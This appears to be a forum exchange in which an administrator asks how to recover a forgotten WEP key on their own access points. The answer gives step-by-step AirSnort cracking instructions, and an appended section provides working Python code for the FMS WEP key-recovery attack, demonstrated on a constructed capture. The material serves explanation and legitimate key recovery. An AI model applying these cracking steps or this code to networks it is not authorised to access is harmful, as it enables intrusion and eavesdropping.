We have 3 APs that were installed before I got here that are running static WEP. Nobody remembers what the key is but we have clients using the APs and I'm hoping to avoid re-keying all of the clients.
Is there a way to take the WEP hash in the config and back into the original key? Kind of like the Cisco password cracker tools you see out there?
But, you could try Airsnort (a public domain WEP cracker).
Go to knoppix.org, download their 4.02 .iso, and burn it to a CD.
Put the CD in the drive and boot the laptop. It will come up in Knoppix Linux (but doesn't write to or otherwise mess with your hard drive).
Open a terminal session, do an "ifconfig eth0 22.214.171.124 netmask 255.0.0.0" (address doesn't matter, you'll be in monitor mode).
Then do an "iwconfig eth0 mode monitor" (this puts the card in monitor mode).
Then type in "airsnort" at the prompt, select eth0 as the interface, hostAP as the type, "scan" as the mode (to start), then hit the start button.
Once it starts running (you'll see information listed in the main window), you can select the channel to monitor specifically (gathers more info just for that channel instead of scanning all the channels).
Then just let it run. Depending on the traffic level, it could take a few hours or a few days or a few weeks. It needs to collect enough "interesting" traffic to make the crack.
Depending on the NIC that you use, the interface could come up as eth0, eth1, ath0, wlan0, wlan1 ... just adjust the commands accordingly.
Once it prints the WEP key, try it on another machine before killing the processes and exiting (or you get to start all over again).
Knoppix Linux is free, and version 4.x works great.
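An added example, not part of the post above or of AirSnort itself, showing what the "interesting" traffic in the answer actually is and why the crack needs enough of it. WEP prepends a 3-byte IV to the secret key and runs RC4; for IVs of the form (A+3, 255, X) the first keystream byte leaks secret key byte A with probability of roughly e^-3 (the Fluhrer-Mantin-Shamir weakness AirSnort exploits), and the first plaintext byte of every 802.11 data frame is the known LLC/SNAP value 0xAA, so the keystream byte is recoverable from ciphertext. The code tallies those votes byte by byte, searches a few top candidates per position, and, following the post's advice to try the key before trusting it, only accepts a key that decrypts captured frames. The 40-bit secret key and the packet capture are constructed for the demo; real frames would come from the monitor-mode card described above.

```python
"""FMS-style WEP key recovery on a constructed capture (demo code, not AirSnort)."""

SNAP_DSAP = 0xAA  # first plaintext byte of every 802.11 data frame (LLC/SNAP DSAP)


def ksa(key, steps=256):
    """Run the first `steps` rounds of RC4 key scheduling; return (S, j)."""
    s = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s, j


def rc4_first_byte(key):
    """First RC4 keystream byte under `key` (WEP per-packet key = IV || secret)."""
    s, _ = ksa(key)
    j = s[1]
    s[1], s[j] = s[j], s[1]
    return s[(s[1] + s[j]) & 0xFF]


def encrypt_first_byte(iv, secret):
    """Ciphertext byte 0 of a WEP frame: SNAP DSAP xor keystream byte 0."""
    return SNAP_DSAP ^ rc4_first_byte(list(iv) + list(secret))


def fms_votes(packets, prefix):
    """Vote for secret byte number len(prefix), assuming `prefix` is correct.

    A packet is "interesting" (resolved) for byte A when, after the first A+3
    KSA rounds, S[1] < A+3 and S[1] + S[S[1]] == A+3.  With probability about
    e^-3 the remaining rounds leave those cells alone, so keystream byte 0
    equals S[A+3] right after round A+3, which reveals the key byte used there.
    Returns all 256 candidate values, most-voted first.
    """
    a = len(prefix)
    votes = [0] * 256
    for iv, c0 in packets:
        s, j = ksa(list(iv) + prefix, a + 3)
        if s[1] >= a + 3 or (s[1] + s[s[1]]) & 0xFF != a + 3:
            continue  # not a resolved IV for this key byte; no information
        out = c0 ^ SNAP_DSAP  # known plaintext byte gives keystream byte 0
        votes[(s.index(out) - j - s[a + 3]) & 0xFF] += 1  # s.index(v) is S^-1[v]
    return sorted(range(256), key=lambda b: -votes[b])


def verify_key(packets, key, count=8):
    """The post's 'try it before trusting it': does the key decrypt real frames?"""
    return all(encrypt_first_byte(iv, key) == c0 for iv, c0 in packets[:count])


def crack_wep(packets, keylen, fudge=8):
    """Depth-first search over the top `fudge` FMS candidates per byte.

    Votes for each deeper byte are recomputed under the prefix chosen so far,
    and a full key is accepted only if it decrypts captured frames.
    Returns the secret key as a list of ints, or None if not enough weak IVs.
    """
    def search(prefix):
        if len(prefix) == keylen:
            return prefix if verify_key(packets, prefix) else None
        for cand in fms_votes(packets, prefix)[:fudge]:
            found = search(prefix + [cand])
            if found is not None:
                return found
        return None
    return search([])


# --- constructed capture: 40-bit key, a few ordinary frames, plus the FMS weak IVs
SECRET_KEY = [0x0B, 0xAD, 0xC0, 0xFF, 0xEE]  # assumed for the demo, not a real key
NORMAL_IVS = [((i * 37) & 0xFF, (i * 91) & 0xFF, (i * 53) & 0xFF) for i in range(1, 9)]
WEAK_IVS = [(a + 3, 0xFF, x) for a in range(len(SECRET_KEY)) for x in range(256)]
CAPTURE = [(iv, encrypt_first_byte(iv, SECRET_KEY)) for iv in NORMAL_IVS + WEAK_IVS]

if __name__ == "__main__":
    key = crack_wep(CAPTURE, len(SECRET_KEY))
    print("recovered:", None if key is None else ":".join(f"{b:02X}" for b in key))
```

Each weak-IV class has only 256 members, and only about one in twenty of them votes correctly, which is why a real capture has to run until enough of those particular IVs have gone by: on a quiet network that is the "few days or a few weeks" in the answer. Drop the weak IVs from `CAPTURE` and `crack_wep` returns `None` rather than a wrong key, because the verification step rejects every guess.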